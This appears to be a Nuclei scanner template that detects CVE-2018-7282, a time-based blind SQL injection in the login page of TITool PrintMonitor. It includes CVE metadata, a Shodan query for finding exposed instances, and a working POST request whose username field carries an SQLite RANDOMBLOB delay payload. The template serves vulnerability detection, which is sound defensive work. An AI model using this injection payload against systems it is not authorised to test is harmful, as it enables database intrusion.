id: CVE-2018-7282 info: name: TITool PrintMonitor - Blind SQL Injection author: theamanrawat severity: critical description: | The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi. remediation: Upgrade to PM18.2.1. reference: - https://fenceposterror.github.io/cve-2018-7282.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7282 - http://print.com - http://ti-tool.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-7282 cwe-id: CWE-89 epss-score: 0.21784 epss-percentile: 0.95908 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: titool product: printmonitor shodan-query: title:"PrintMonitor" product": printmonitor tags: cve,cve2018,sqli,printmonitor,unauth variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" http: - raw: - | @timeout: 20s POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en host-redirects: true matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and # digest: 490a0046304402206f9712d17cb904b82f0a33e4c442e9e04eea9a26c0d8af74eabecd99776884fb022005c73c95f7716f55338e1fb3324ed81910700cee4b7adfef86346ab0ce304bf0:922c64590222798bb761d5b6d8e72950